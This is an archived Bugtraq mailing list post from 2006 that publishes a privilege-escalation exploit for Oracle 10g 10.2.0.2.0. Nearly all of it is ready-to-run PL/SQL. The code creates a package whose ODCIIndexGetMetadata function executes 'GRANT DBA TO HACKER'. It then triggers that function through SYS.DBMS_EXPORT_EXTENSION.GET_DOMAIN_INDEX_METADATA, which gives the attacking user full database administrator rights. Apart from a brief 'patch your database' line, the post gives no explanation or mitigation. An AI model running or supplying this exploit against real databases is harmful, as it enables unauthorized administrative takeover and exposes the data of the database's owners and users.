Home page logo
/

bugtraq logo Bugtraq mailing list archives

Oracle 10g 10.2.0.2.0 DBA exploit
From: "putosoft softputo" <hasecorp () hotmail com>
Date: Wed, 19 Apr 2006 08:33:56 +0000

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
  RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
   RETURN NUMBER
 IS
  pragma autonomous_transaction;
 BEGIN
   EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
   COMMIT;
   RETURN(1);
 END;

END;
/

DECLARE
 INDEX_NAME VARCHAR2(200);
 INDEX_SCHEMA VARCHAR2(200);
 TYPE_NAME VARCHAR2(200);
 TYPE_SCHEMA VARCHAR2(200);
 VERSION VARCHAR2(200);
 NEWBLOCK PLS_INTEGER;
 GMFLAGS NUMBER;
 v_Return VARCHAR2(200);
BEGIN
 INDEX_NAME := 'A1';  INDEX_SCHEMA := 'HACKER';
 TYPE_NAME := 'MYBADPACKAGE';  TYPE_SCHEMA := 'HACKER';
 VERSION := '10.2.0.2.0';  GMFLAGS := 1;

 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => NEWBLOCK, GMFLAGS => GMFLAGS
          );
END;
/

_________________________________________________________________
Acepta el reto MSN Premium: Correos más divertidos con fotos y textos increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis. http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos


  By Date           By Thread  

Current thread:
  • Oracle 10g 10.2.0.2.0 DBA exploit putosoft softputo (Apr 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault